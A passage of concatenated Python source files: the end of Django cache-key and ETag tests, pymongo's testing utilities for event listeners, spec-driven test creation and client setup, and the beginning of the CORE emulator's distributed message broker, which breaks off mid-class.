('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
@override_settings(ROOT_URLCONF="admin_views.urls")
class TestEtagWithAdmin(TestCase):
# See https://code.djangoproject.com/ticket/16003
def test_admin(self):
with self.settings(USE_ETAGS=False):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertFalse(response.has_header('ETag'))
with self.settings(USE_ETAGS=True):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertTrue(cache1 is cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertFalse(c[0] is c[1])
|
utils.py
|
# Copyright 2012-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for testing pymongo
"""
import collections
import contextlib
import functools
import os
import re
import sys
import threading
import time
import warnings
from collections import defaultdict
from functools import partial
from bson import json_util, py3compat
from bson.objectid import ObjectId
from pymongo import (MongoClient,
monitoring)
from pymongo.errors import OperationFailure
from pymongo.monitoring import _SENSITIVE_COMMANDS
from pymongo.read_concern import ReadConcern
from pymongo.server_selectors import (any_server_selector,
writable_server_selector)
from pymongo.write_concern import WriteConcern
from test import (client_context,
db_user,
db_pwd)
from test.utils_selection_tests import parse_read_preference
IMPOSSIBLE_WRITE_CONCERN = WriteConcern(w=1000)
class WhiteListEventListener(monitoring.CommandListener):
def __init__(self, *commands):
self.commands = set(commands)
self.results = defaultdict(list)
def started(self, event):
if event.command_name in self.commands:
self.results['started'].append(event)
def succeeded(self, event):
if event.command_name in self.commands:
self.results['succeeded'].append(event)
def failed(self, event):
if event.command_name in self.commands:
self.results['failed'].append(event)
class EventListener(monitoring.CommandListener):
def __init__(self):
self.results = defaultdict(list)
def started(self, event):
self.results['started'].append(event)
def succeeded(self, event):
self.results['succeeded'].append(event)
def failed(self, event):
self.results['failed'].append(event)
def started_command_names(self):
"""Return list of command names started."""
return [event.command_name for event in self.results['started']]
class OvertCommandListener(EventListener):
"""A CommandListener that ignores sensitive commands."""
def started(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).started(event)
def succeeded(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).succeeded(event)
def failed(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).failed(event)
class ServerAndTopologyEventListener(monitoring.ServerListener,
monitoring.TopologyListener):
"""Listens to all events."""
def __init__(self):
self.results = []
def opened(self, event):
self.results.append(event)
def description_changed(self, event):
self.results.append(event)
def closed(self, event):
self.results.append(event)
class HeartbeatEventListener(monitoring.ServerHeartbeatListener):
"""Listens to only server heartbeat events."""
def __init__(self):
self.results = []
def started(self, event):
self.results.append(event)
def succeeded(self, event):
self.results.append(event)
def failed(self, event):
self.results.append(event)
class ScenarioDict(dict):
"""Dict that returns {} for any unknown key, recursively."""
def __init__(self, data):
def convert(v):
if isinstance(v, collections.Mapping):
return ScenarioDict(v)
if isinstance(v, (py3compat.string_type, bytes)):
return v
if isinstance(v, collections.Sequence):
return [convert(item) for item in v]
return v
dict.__init__(self, [(k, convert(v)) for k, v in data.items()])
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
# Unlike a defaultdict, don't set the key, just return a dict.
return ScenarioDict({})
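# Illustrative sketch (not part of the original module): ScenarioDict lets test
# code index optional parts of a JSON scenario without guarding every lookup.
#
#     scenario = ScenarioDict({'tests': [{'description': 'insert one'}]})
#     scenario['runOn']                      # {} instead of a KeyError
#     scenario['tests'][0]['description']    # 'insert one'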
class CompareType(object):
"""Class that compares equal to any object of the given type."""
def __init__(self, type):
self.type = type
def __eq__(self, other):
return isinstance(other, self.type)
def __ne__(self, other):
"""Needed for Python 2."""
return not self.__eq__(other)
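# Illustrative sketch (not part of the original module): CompareType stands in
# for "any value of this type" when comparing command documents in assertions.
#
#     expected = {'insert': 'coll', 'lsid': CompareType(dict)}
#     expected == {'insert': 'coll', 'lsid': {'id': 'anything'}}    # True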
class TestCreator(object):
"""Class to create test cases from specifications."""
def __init__(self, create_test, test_class, test_path):
"""Create a TestCreator object.
:Parameters:
- `create_test`: callback that returns a test case. The callback
must accept the following arguments - a dictionary containing the
entire test specification (the `scenario_def`), a dictionary
containing the specification for which the test case will be
generated (the `test_def`).
- `test_class`: the unittest.TestCase class in which to create the
test case.
- `test_path`: path to the directory containing the JSON files with
the test specifications.
"""
self._create_test = create_test
self._test_class = test_class
self.test_path = test_path
def _ensure_min_max_server_version(self, scenario_def, method):
"""Test modifier that enforces a version range for the server on a
test case."""
if 'minServerVersion' in scenario_def:
min_ver = tuple(
int(elt) for
elt in scenario_def['minServerVersion'].split('.'))
if min_ver is not None:
method = client_context.require_version_min(*min_ver)(method)
if 'maxServerVersion' in scenario_def:
max_ver = tuple(
int(elt) for
elt in scenario_def['maxServerVersion'].split('.'))
if max_ver is not None:
method = client_context.require_version_max(*max_ver)(method)
return method
@staticmethod
def valid_topology(run_on_req):
return client_context.is_topology_type(
run_on_req.get('topology', ['single', 'replicaset', 'sharded']))
@staticmethod
def min_server_version(run_on_req):
version = run_on_req.get('minServerVersion')
if version:
min_ver = tuple(int(elt) for elt in version.split('.'))
return client_context.version >= min_ver
return True
@staticmethod
def max_server_version(run_on_req):
version = run_on_req.get('maxServerVersion')
if version:
max_ver = tuple(int(elt) for elt in version.split('.'))
return client_context.version <= max_ver
return True
def should_run_on(self, scenario_def):
run_on = scenario_def.get('runOn', [])
if not run_on:
# Always run these tests.
return True
for req in run_on:
if (self.valid_topology(req) and
self.min_server_version(req) and
self.max_server_version(req)):
return True
return False
def ensure_run_on(self, scenario_def, method):
"""Test modifier that enforces a 'runOn' on a test case."""
return client_context._require(
lambda: self.should_run_on(scenario_def),
"runOn not satisfied",
method)
def create_tests(self):
for dirpath, _, filenames in os.walk(self.test_path):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = ScenarioDict(
json_util.loads(scenario_stream.read()))
test_type = os.path.splitext(filename)[0]
# Construct test from scenario.
for test_def in scenario_def['tests']:
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_").replace('.', '_'),
str(test_def['description'].replace(" ", "_").replace(
'.', '_')))
new_test = self._create_test(
scenario_def, test_def, test_name)
new_test = self._ensure_min_max_server_version(
scenario_def, new_test)
new_test = self.ensure_run_on(
scenario_def, new_test)
new_test.__name__ = test_name
setattr(self._test_class, new_test.__name__, new_test)
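# Illustrative sketch (not part of the original module) of how TestCreator is
# typically wired up; `create_spec_test`, `SpecTestCase`, and the helper
# `run_scenario` are hypothetical placeholders.
#
#     def create_spec_test(scenario_def, test_def, name):
#         def run(self):
#             self.run_scenario(scenario_def, test_def)
#         return run
#
#     TestCreator(create_spec_test, SpecTestCase, '/path/to/json_specs').create_tests()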
def _connection_string(h, authenticate):
if h.startswith("mongodb://"):
return h
elif client_context.auth_enabled and authenticate:
return "mongodb://%s:%s@%s" % (db_user, db_pwd, str(h))
else:
return "mongodb://%s" % (str(h),)
def _mongo_client(host, port, authenticate=True, direct=False, **kwargs):
"""Create a new client over SSL/TLS if necessary."""
host = host or client_context.host
port = port or client_context.port
client_options = client_context.default_client_options.copy()
if client_context.replica_set_name and not direct:
client_options['replicaSet'] = client_context.replica_set_name
client_options.update(kwargs)
client = MongoClient(_connection_string(host, authenticate), port,
**client_options)
return client
def single_client_noauth(h=None, p=None, **kwargs):
"""Make a direct connection. Don't authenticate."""
return _mongo_client(h, p, authenticate=False, direct=True, **kwargs)
def single_client(h=None, p=None, **kwargs):
"""Make a direct connection, and authenticate if necessary."""
return _mongo_client(h, p, direct=True, **kwargs)
def rs_client_noauth(h=None, p=None, **kwargs):
"""Connect to the replica set. Don't authenticate."""
return _mongo_client(h, p, authenticate=False, **kwargs)
def rs_client(h=None, p=None, **kwargs):
"""Connect to the replica set and authenticate if necessary."""
return _mongo_client(h, p, **kwargs)
def rs_or_single_client_noauth(h=None, p=None, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Like rs_or_single_client, but does not authenticate.
"""
return _mongo_client(h, p, authenticate=False, **kwargs)
def rs_or_single_client(h=None, p=None, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Authenticates if necessary.
"""
return _mongo_client(h, p, **kwargs)
def one(s):
"""Get one element of a set"""
return next(iter(s))
def oid_generated_on_process(oid):
"""Makes a determination as to whether the given ObjectId was generated
by the current process, based on the 5-byte random number in the ObjectId.
"""
return ObjectId._random() == oid.binary[4:9]
def delay(sec):
return '''function() { sleep(%f * 1000); return true; }''' % sec
def get_command_line(client):
command_line = client.admin.command('getCmdLineOpts')
assert command_line['ok'] == 1, "getCmdLineOpts() failed"
return command_line
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
def camel_to_upper_camel(camel):
return camel[0].upper() + camel[1:]
def camel_to_snake_args(arguments):
for arg_name in list(arguments):
c2s = camel_to_snake(arg_name)
arguments[c2s] = arguments.pop(arg_name)
return arguments
def parse_collection_options(opts):
if 'readPreference' in opts:
opts['read_preference'] = parse_read_preference(
opts.pop('readPreference'))
if 'writeConcern' in opts:
opts['write_concern'] = WriteConcern(
**dict(opts.pop('writeConcern')))
if 'readConcern' in opts:
opts['read_concern'] = ReadConcern(
**dict(opts.pop('readConcern')))
return opts
def server_started_with_option(client, cmdline_opt, config_opt):
"""Check if the server was started with a particular option.
:Parameters:
      - `cmdline_opt`: The command line option (e.g. --nojournal)
      - `config_opt`: The config file option (e.g. nojournal)
"""
command_line = get_command_line(client)
if 'parsed' in command_line:
parsed = command_line['parsed']
if config_opt in parsed:
return parsed[config_opt]
argv = command_line['argv']
return cmdline_opt in argv
def server_started_with_auth(client):
try:
command_line = get_command_line(client)
except OperationFailure as e:
msg = e.details.get('errmsg', '')
if e.code == 13 or 'unauthorized' in msg or 'login' in msg:
# Unauthorized.
return True
raise
# MongoDB >= 2.0
if 'parsed' in command_line:
parsed = command_line['parsed']
# MongoDB >= 2.6
if 'security' in parsed:
security = parsed['security']
# >= rc3
if 'authorization' in security:
return security['authorization'] == 'enabled'
# < rc3
return security.get('auth', False) or bool(security.get('keyFile'))
return parsed.get('auth', False) or bool(parsed.get('keyFile'))
# Legacy
argv = command_line['argv']
return '--auth' in argv or '--keyFile' in argv
def server_started_with_nojournal(client):
command_line = get_command_line(client)
# MongoDB 2.6.
if 'parsed' in command_line:
parsed = command_line['parsed']
if 'storage' in parsed:
storage = parsed['storage']
if 'journal' in storage:
return not storage['journal']['enabled']
return server_started_with_option(client, '--nojournal', 'nojournal')
def server_is_master_with_slave(client):
command_line = get_command_line(client)
if 'parsed' in command_line:
return command_line['parsed'].get('master', False)
return '--master' in command_line['argv']
def drop_collections(db):
# Drop all non-system collections in this database.
for coll in db.list_collection_names(
filter={"name": {"$regex": r"^(?!system\.)"}}):
db.drop_collection(coll)
def remove_all_users(db):
db.command("dropAllUsersFromDatabase", 1,
writeConcern={"w": client_context.w})
def joinall(threads):
"""Join threads with a 5-minute timeout, assert joins succeeded"""
for t in threads:
t.join(300)
assert not t.isAlive(), "Thread %s hung" % t
def connected(client):
"""Convenience to wait for a newly-constructed client to connect."""
with warnings.catch_warnings():
# Ignore warning that "ismaster" is always routed to primary even
# if client's read preference isn't PRIMARY.
warnings.simplefilter("ignore", UserWarning)
client.admin.command('ismaster') # Force connection.
return client
def wait_until(predicate, success_description, timeout=10):
"""Wait up to 10 seconds (by default) for predicate to be true.
E.g.:
wait_until(lambda: client.primary == ('a', 1),
'connect to the primary')
If the lambda-expression isn't true after 10 seconds, we raise
AssertionError("Didn't ever connect to the primary").
Returns the predicate's first true value.
"""
start = time.time()
while True:
retval = predicate()
if retval:
return retval
if time.time() - start > timeout:
raise AssertionError("Didn't ever %s" % success_description)
time.sleep(0.1)
def is_mongos(client):
res = client.admin.command('ismaster')
return res.get('msg', '') == 'isdbgrid'
def assertRaisesExactly(cls, fn, *args, **kwargs):
"""
Unlike the standard assertRaises, this checks that a function raises a
specific class of exception, and not a subclass. E.g., check that
MongoClient() raises ConnectionFailure but not its subclass, AutoReconnect.
"""
try:
fn(*args, **kwargs)
except Exception as e:
assert e.__class__ == cls, "got %s, expected %s" % (
e.__class__.__name__, cls.__name__)
else:
raise AssertionError("%s not raised" % cls)
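# Illustrative sketch (not part of the original module): assert that a call
# raises ValueError itself, not merely a ValueError subclass.
#
#     def parse_positive(value):
#         if int(value) <= 0:
#             raise ValueError('expected a positive integer')
#         return int(value)
#
#     assertRaisesExactly(ValueError, parse_positive, '-1')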
@contextlib.contextmanager
def _ignore_deprecations():
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
yield
def ignore_deprecations(wrapped=None):
"""A context manager or a decorator."""
if wrapped:
@functools.wraps(wrapped)
def wrapper(*args, **kwargs):
with _ignore_deprecations():
return wrapped(*args, **kwargs)
return wrapper
else:
return _ignore_deprecations()
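# Illustrative sketch (not part of the original module): ignore_deprecations
# works both as a decorator and as a context manager.
#
#     @ignore_deprecations
#     def test_legacy_api(self):
#         ...
#
#     with ignore_deprecations():
#         legacy_call()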
class DeprecationFilter(object):
def __init__(self, action="ignore"):
"""Start filtering deprecations."""
self.warn_context = warnings.catch_warnings()
self.warn_context.__enter__()
warnings.simplefilter(action, DeprecationWarning)
def stop(self):
"""Stop filtering deprecations."""
self.warn_context.__exit__()
self.warn_context = None
def get_pool(client):
"""Get the standalone, primary, or mongos pool."""
topology = client._get_topology()
server = topology.select_server(writable_server_selector)
return server.pool
def get_pools(client):
"""Get all pools."""
return [
server.pool for server in
client._get_topology().select_servers(any_server_selector)]
# Constants for run_threads and lazy_client_trial.
NTRIALS = 5
NTHREADS = 10
def run_threads(collection, target):
"""Run a target function in many threads.
target is a function taking a Collection and an integer.
"""
threads = []
for i in range(NTHREADS):
bound_target = partial(target, collection, i)
threads.append(threading.Thread(target=bound_target))
for t in threads:
t.start()
for t in threads:
t.join(60)
assert not t.isAlive()
@contextlib.contextmanager
def frequent_thread_switches():
"""Make concurrency bugs more likely to manifest."""
interval = None
if not sys.platform.startswith('java'):
if hasattr(sys, 'getswitchinterval'):
interval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
else:
interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
yield
finally:
if not sys.platform.startswith('java'):
if hasattr(sys, 'setswitchinterval'):
sys.setswitchinterval(interval)
else:
sys.setcheckinterval(interval)
def lazy_client_trial(reset, target, test, get_client):
"""Test concurrent operations on a lazily-connecting client.
`reset` takes a collection and resets it for the next trial.
`target` takes a lazily-connecting collection and an index from
0 to NTHREADS, and performs some operation, e.g. an insert.
`test` takes the lazily-connecting collection and asserts a
post-condition to prove `target` succeeded.
"""
collection = client_context.client.pymongo_test.test
with frequent_thread_switches():
for i in range(NTRIALS):
reset(collection)
lazy_client = get_client()
lazy_collection = lazy_client.pymongo_test.test
run_threads(lazy_collection, target)
test(lazy_collection)
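# Illustrative sketch (not part of the original module) of the reset/target/test
# triple that lazy_client_trial expects; the helpers below are hypothetical.
#
#     def reset(collection):
#         collection.drop()
#
#     def insert_doc(collection, i):
#         collection.insert_one({'thread': i})
#
#     def check(collection):
#         assert collection.count_documents({}) == NTHREADS
#
#     lazy_client_trial(reset, insert_doc, check, rs_or_single_client)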
def gevent_monkey_patched():
"""Check if gevent's monkey patching is active."""
# In Python 3.6 importing gevent.socket raises an ImportWarning.
with warnings.catch_warnings():
warnings.simplefilter("ignore", ImportWarning)
try:
import socket
import gevent.socket
return socket.socket is gevent.socket.socket
except ImportError:
return False
def eventlet_monkey_patched():
"""Check if eventlet's monkey patching is active."""
try:
import threading
import eventlet
return (threading.current_thread.__module__ ==
'eventlet.green.threading')
except ImportError:
return False
def is_greenthread_patched():
return gevent_monkey_patched() or eventlet_monkey_patched()
def disable_replication(client):
"""Disable replication on all secondaries, requires MongoDB 3.2."""
for host, port in client.secondaries:
secondary = single_client(host, port)
secondary.admin.command('configureFailPoint', 'stopReplProducer',
mode='alwaysOn')
def enable_replication(client):
"""Enable replication on all secondaries, requires MongoDB 3.2."""
for host, port in client.secondaries:
secondary = single_client(host, port)
secondary.admin.command('configureFailPoint', 'stopReplProducer',
mode='off')
class ExceptionCatchingThread(threading.Thread):
"""A thread that stores any exception encountered from run()."""
def __init__(self, *args, **kwargs):
self.exc = None
super(ExceptionCatchingThread, self).__init__(*args, **kwargs)
def run(self):
try:
super(ExceptionCatchingThread, self).run()
except BaseException as exc:
self.exc = exc
raise
|
broker.py
|
"""
Broker class that is part of the session object. Handles distributing parts of the emulation out to
other emulation servers. The broker is consulted when handling messages to determine if messages
should be handled locally or forwarded on to another emulation server.
"""
import logging
import os
import select
import socket
import threading
from core import utils
from core.api.tlv import coreapi
from core.nodes.base import CoreNodeBase, CoreNetworkBase
from core.emulator.enumerations import ConfigDataTypes
from core.emulator.enumerations import ConfigFlags
from core.emulator.enumerations import ConfigTlvs
from core.emulator.enumerations import EventTlvs
from core.emulator.enumerations import EventTypes
from core.emulator.enumerations import ExecuteTlvs
from core.emulator.enumerations import FileTlvs
from core.emulator.enumerations import LinkTlvs
from core.emulator.enumerations import MessageFlags
from core.emulator.enumerations import MessageTypes
from core.emulator.enumerations import NodeTlvs
from core.emulator.enumerations import NodeTypes
from core.emulator.enumerations import RegisterTlvs
from core.nodes import nodeutils
from core.nodes.ipaddress import IpAddress
from core.nodes.interface import GreTap
from core.nodes.network import GreTapBridge
from core.nodes.physical import PhysicalNode
class CoreDistributedServer(object):
"""
Represents CORE daemon servers for communication.
"""
def __init__(self, name, host, port):
"""
        Creates a CoreDistributedServer instance.
:param str name: name of the CORE server
:param str host: server address
:param int port: server port
"""
self.name = name
self.host = host
self.port = port
self.sock = None
self.instantiation_complete = False
def connect(self):
"""
Connect to CORE server and save connection.
:return: nothing
"""
if self.sock:
raise ValueError("socket already connected")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((self.host, self.port))
except IOError as e:
sock.close()
raise e
self.sock = sock
def close(self):
"""
Close connection with CORE server.
:return: nothing
"""
if self.sock is not None:
self.sock.close()
self.sock = None
class CoreBroker(object):
"""
Helps with brokering messages between CORE daemon servers.
"""
# configurable manager name
name = "broker"
# configurable manager type
config_type = RegisterTlvs.UTILITY.value
def __init__(self, session):
"""
Creates a CoreBroker instance.
:param core.emulator.session.Session session: session this manager is tied to
:return: nothing
"""
# ConfigurableManager.__init__(self)
self.session = session
self.session_clients = []
self.session_id_master = None
self.myip = None
# dict containing tuples of (host, port, sock)
self.servers = {}
self.servers_lock = threading.Lock()
self.addserver("localhost", None, None)
# dict containing node number to server name mapping
self.nodemap = {}
# this lock also protects self.nodecounts
self.nodemap_lock = threading.Lock()
# reference counts of nodes on servers
self.nodecounts = {}
# set of node numbers that are link-layer nodes (networks)
self.network_nodes = set()
# set of node numbers that are PhysicalNode nodes
self.physical_nodes = set()
# allows for other message handlers to process API messages (e.g. EMANE)
self.handlers = set()
# dict with tunnel key to tunnel device mapping
self.tunnels = {}
self.dorecvloop = False
self.recvthread = None
self.bootcount = 0
def startup(self):
"""
Build tunnels between network-layer nodes now that all node
and link information has been received; called when session
        enters the instantiation state.
"""
self.addnettunnels()
self.writeservers()
def shutdown(self):
"""
Close all active sockets; called when the session enters the
data collect state
"""
self.reset()
with self.servers_lock:
while len(self.servers) > 0:
name, server = self.servers.popitem()
if server.sock is not None:
logging.info("closing connection with %s: %s:%s", name, server.host, server.port)
server.close()
self.dorecvloop = False
if self.recvthread is not None:
self.recvthread.join()
def reset(self):
"""
Reset to initial state.
"""
logging.info("clearing state")
self.nodemap_lock.acquire()
self.nodemap.clear()
for server in self.nodecounts:
count = self.nodecounts[server]
if count < 1:
self.delserver(server)
self.nodecounts.clear()
self.bootcount = 0
self.nodemap_lock.release()
self.network_nodes.clear()
self.physical_nodes.clear()
while len(self.tunnels) > 0:
_key, gt = self.tunnels.popitem()
gt.shutdown()
def startrecvloop(self):
"""
Spawn the receive loop for receiving messages.
"""
if self.recvthread is not None:
logging.info("server receive loop already started")
if self.recvthread.isAlive():
return
else:
self.recvthread.join()
# start reading data from connected sockets
logging.info("starting server receive loop")
self.dorecvloop = True
self.recvthread = threading.Thread(target=self.recvloop)
self.recvthread.daemon = True
self.recvthread.start()
def recvloop(self):
"""
Receive loop for receiving messages from server sockets.
"""
self.dorecvloop = True
# note: this loop continues after emulation is stopped,
# even with 0 servers
while self.dorecvloop:
rlist = []
with self.servers_lock:
# build a socket list for select call
for name in self.servers:
server = self.servers[name]
if server.sock is not None:
rlist.append(server.sock)
r, _w, _x = select.select(rlist, [], [], 1.0)
for sock in r:
                server = self.getserverbysock(sock)
                if server is None:
                    # servers may have changed; loop again
                    continue
                logging.info("attempting to receive from server: peer:%s remote:%s",
                             server.sock.getpeername(), server.sock.getsockname())
rcvlen = self.recv(server)
if rcvlen == 0:
logging.info("connection with server(%s) closed: %s:%s", server.name, server.host, server.port)
def recv(self, server):
"""
Receive data on an emulation server socket and broadcast it to
        all connected session handlers. Returns the length of data received
and forwarded. Return value of zero indicates the socket has closed
and should be removed from the self.servers dict.
:param CoreDistributedServer server: server to receive from
:return: message length
:rtype: int
"""
msghdr = server.sock.recv(coreapi.CoreMessage.header_len)
if len(msghdr) == 0:
# server disconnected
logging.info("server disconnected, closing server")
server.close()
return 0
if len(msghdr) != coreapi.CoreMessage.header_len:
logging.warning("warning: broker received not enough data len=%s", len(msghdr))
return len(msghdr)
msgtype, msgflags, msglen = coreapi.CoreMessage.unpack_header(msghdr)
msgdata = server.sock.recv(msglen)
data = msghdr + msgdata
count = None
logging.debug("received message type: %s", MessageTypes(msgtype))
# snoop exec response for remote interactive TTYs
if msgtype == MessageTypes.EXECUTE.value and msgflags & MessageFlags.TTY.value:
data = self.fixupremotetty(msghdr, msgdata, server.host)
logging.debug("created remote tty message: %s", data)
elif msgtype == MessageTypes.NODE.value:
# snoop node delete response to decrement node counts
if msgflags & MessageFlags.DELETE.value:
msg = coreapi.CoreNodeMessage(msgflags, msghdr, msgdata)
nodenum = msg.get_tlv(NodeTlvs.NUMBER.value)
if nodenum is not None:
count = self.delnodemap(server, nodenum)
elif msgtype == MessageTypes.LINK.value:
# this allows green link lines for remote WLANs
msg = coreapi.CoreLinkMessage(msgflags, msghdr, msgdata)
self.session.sdt.handle_distributed(msg)
elif msgtype == MessageTypes.EVENT.value:
msg = coreapi.CoreEventMessage(msgflags, msghdr, msgdata)
eventtype = msg.get_tlv(EventTlvs.TYPE.value)
if eventtype == EventTypes.INSTANTIATION_COMPLETE.value:
server.instantiation_complete = True
if self.instantiation_complete():
self.session.check_runtime()
else:
logging.error("unknown message type received: %s", msgtype)
try:
for session_client in self.session_clients:
session_client.sendall(data)
except IOError:
logging.exception("error sending message")
if count is not None and count < 1:
return 0
else:
return len(data)
def addserver(self, name, host, port):
"""
        Add a new server, and try to connect to it. If we're already connected to this
        (host, port), then leave it alone. When host, port is None, do not try to connect.
:param str name: name of server
:param str host: server address
:param int port: server port
:return: nothing
"""
with self.servers_lock:
server = self.servers.get(name)
if server is not None:
if host == server.host and port == server.port and server.sock is not None:
# leave this socket connected
return
logging.info("closing connection with %s @ %s:%s", name, server.host, server.port)
server.close()
del self.servers[name]
logging.info("adding broker server(%s): %s:%s", name, host, port)
server = CoreDistributedServer(name, host, port)
if host is not None and port is not None:
try:
server.connect()
except IOError:
logging.exception("error connecting to server(%s): %s:%s", name, host, port)
if server.sock is not None:
self.startrecvloop()
self.servers[name] = server
def delserver(self, server):
"""
Remove a server and hang up any connection.
:param CoreDistributedServer server: server to delete
:return: nothing
"""
with self.servers_lock:
try:
s = self.servers.pop(server.name)
if s != server:
raise ValueError("server removed was not the server provided")
except KeyError:
logging.exception("error deleting server")
if server.sock is not None:
logging.info("closing connection with %s @ %s:%s", server.name, server.host, server.port)
server.close()
def getserverbyname(self, name):
"""
Return the server object having the given name, or None.
:param str name: name of server to retrieve
:return: server for given name
:rtype: CoreDistributedServer
"""
with self.servers_lock:
return self.servers.get(name)
def getserverbysock(self, sock):
"""
Return the server object corresponding to the given socket, or None.
:param sock: socket associated with a server
        :return: core server associated with the socket
:rtype: CoreDistributedServer
"""
with self.servers_lock:
for name in self.servers:
server = self.servers[name]
if server.sock == sock:
return server
return None
def getservers(self):
"""
Return a list of servers sorted by name.
:return: sorted server list
:rtype: list
"""
with self.servers_lock:
return sorted(self.servers.values(), key=lambda x: x.name)
def getservernames(self):
"""
Return a sorted list of server names (keys from self.servers).
:return: sorted server names
:rtype: list
"""
with self.servers_lock:
return sorted(self.servers.keys())
def tunnelkey(self, n1num, n2num):
"""
Compute a 32-bit key used to uniquely identify a GRE tunnel.
The hash(n1num), hash(n2num) values are used, so node numbers may be
None or string values (used for e.g. "ctrlnet").
:param int n1num: node one id
:param int n2num: node two id
:return: tunnel key for the node pair
:rtype: int
"""
logging.debug("creating tunnel key for: %s, %s", n1num, n2num)
sid = self.session_id_master
if sid is None:
# this is the master session
sid = self.session.id
key = (sid << 16) ^ utils.hashkey(n1num) ^ (utils.hashkey(n2num) << 8)
return key & 0xFFFFFFFF
def addtunnel(self, remoteip, n1num, n2num, localnum):
"""
Adds a new GreTapBridge between nodes on two different machines.
:param str remoteip: remote address for tunnel
:param int n1num: node one id
:param int n2num: node two id
:param int localnum: local id
:return: nothing
"""
key = self.tunnelkey(n1num, n2num)
if localnum == n2num:
remotenum = n1num
else:
remotenum = n2num
if key in self.tunnels.keys():
logging.warning("tunnel with key %s (%s-%s) already exists!", key, n1num, n2num)
else:
_id = key & ((1 << 16) - 1)
logging.info("adding tunnel for %s-%s to %s with key %s", n1num, n2num, remoteip, key)
if localnum in self.physical_nodes:
# no bridge is needed on physical nodes; use the GreTap directly
gt = GreTap(node=None, name=None, session=self.session,
remoteip=remoteip, key=key)
else:
gt = self.session.create_node(cls=GreTapBridge, _id=_id, policy="ACCEPT", remoteip=remoteip, key=key)
gt.localnum = localnum
gt.remotenum = remotenum
self.tunnels[key] = gt
def addnettunnels(self):
"""
Add GreTaps between network devices on different machines.
The GreTapBridge is not used since that would add an extra bridge.
"""
